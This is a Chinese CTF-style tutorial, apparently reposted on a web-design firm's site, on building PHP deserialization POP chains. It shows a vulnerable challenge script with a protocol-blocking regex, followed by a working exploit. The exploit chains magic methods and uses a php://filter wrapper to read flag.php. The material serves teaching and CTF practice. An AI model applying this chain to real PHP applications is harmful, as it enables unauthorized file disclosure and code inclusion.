本篇內容主要講解“php反序列化pop鏈構造知識點有哪些”，感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷，實用性強。下面就讓小編來帶大家學習“php反序列化pop鏈構造知識點有哪些”吧!

創(chuàng)新互聯(lián)專注于蒙自企業(yè)網(wǎng)站建設,成都響應式網(wǎng)站建設,成都做商城網(wǎng)站。蒙自網(wǎng)站建設公司,為蒙自等地區(qū)提供建站服務。全流程按需網(wǎng)站設計，專業(yè)設計，全程項目跟蹤，創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務

pop鏈構造

一般的反序列化題目，存在漏洞或者能注入惡意代碼的地方在魔術方法中，我們可以通過自動調用魔術方法來達到攻擊效果。但是當注入點存在普通的類方法中，通過前面自動調用的方法就失效了，所以我們需要找到普通類與魔術方法之間的聯(lián)系，理出一種邏輯思路，通過這種邏輯思路來構造一條pop鏈，從而達到攻擊的目的。所以我們在做這類pop題目一定要緊盯魔術方法。

pop鏈簡介

它是一種面向屬性編程，常用于構造調用鏈的方法。在題目中的代碼里找到一系列能調用的指令，并將這些指令整合成一條有邏輯的能達到惡意攻擊效果的代碼，就是pop鏈（個人理解，歡迎師傅們提出意見）在構造pop鏈中，魔術方法必不可少。下面將通過一個例題來說pop鏈是怎么構造的，以及具體構造的思路

上題目代碼：

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

構造思路

在構造調用鏈時，先找到調用鏈的頭和尾。頭一般都是能傳參以及可以反序列化的地方，而尾部一般都是可以執(zhí)行惡意代碼的地方。審計這個題的代碼，頭是用get方式對pop傳參，而尾部是include包含函數(shù)。到這里，我們應該都知道是要用php偽協(xié)議讀取flag文件的源碼。既然頭和尾都找到了，也知道了攻擊方法。那么接下來找到題目中的魔術方法。

__invoke()    當一個類被當作函數(shù)執(zhí)行時調用此方法。

__construct   在創(chuàng)建對象時調用此方法

__toString()  在一個類被當作字符串處理時調用此方法

__wakeup()    當反序列化恢復成對象時調用此方法

__get()       當讀取不可訪問或不存在的屬性的值會被調用

題中一共有這五種魔術方法。接著找出普通類與魔術方法之間的聯(lián)系。

不難看出wakeup函數(shù)中有個preg_match函數(shù)，用于查找source中敏感的字符串，我們可以從這里開頭，將source賦予一個show類，那么會自動觸發(fā)toString函數(shù)，那么現(xiàn)在就要在tostring方法中延申鏈子，那么我們可以在totring方法中$this->str賦予test類，在test類讀取source變量，（因為test類中沒有source屬性，則是訪問了不可訪問的屬性）則會自動調用get魔術方法。可以發(fā)現(xiàn)get方法中有個函數(shù)調用，則我們可以將$this->p賦予Modifier類，會自動調用invoke方法，從而執(zhí)行我們寫入的php偽協(xié)議（將Modifer類中的var屬性賦值為我們的惡意代碼）

至此，我們構造pop鏈。

pop鏈講解

<?php
class Modifier {
	protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
	public $source;
	public $str;
	function _construct(){
		$this->source=$file;
	}
}
class Test{
	public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>

先把用到的類寫出來，形成一個框架，再表明類中的變量。分別將用到的類進行實例化，這里為什么要new 兩次show（看代碼應該能看懂，第一次是實例化show類,第二次是將第一次實例化后的show類中的source=第二次實例化的show）

在我們進行序列化的時候盡量用url編碼一下（在這個題中有protected修飾的屬性，會有不可見字符）

到此，相信大家對“php反序列化pop鏈構造知識點有哪些”有了更深的了解，不妨來實際操作一番吧！這里是創(chuàng)新互聯(lián)網(wǎng)站，更多相關內容可以進入相關頻道進行查詢，關注我們，繼續(xù)學習！

當前名稱：php反序列化pop鏈構造知識點有哪些
分享URL：http://chinadenli.net/article6/gjocig.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供域名注冊、網(wǎng)站設計公司、App開發(fā)、企業(yè)建站、搜索引擎優(yōu)化、面包屑導航

廣告

聲明：本網(wǎng)站發(fā)布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經(jīng)允許不得轉載，或轉載時需注明來源： 創(chuàng)新互聯(lián)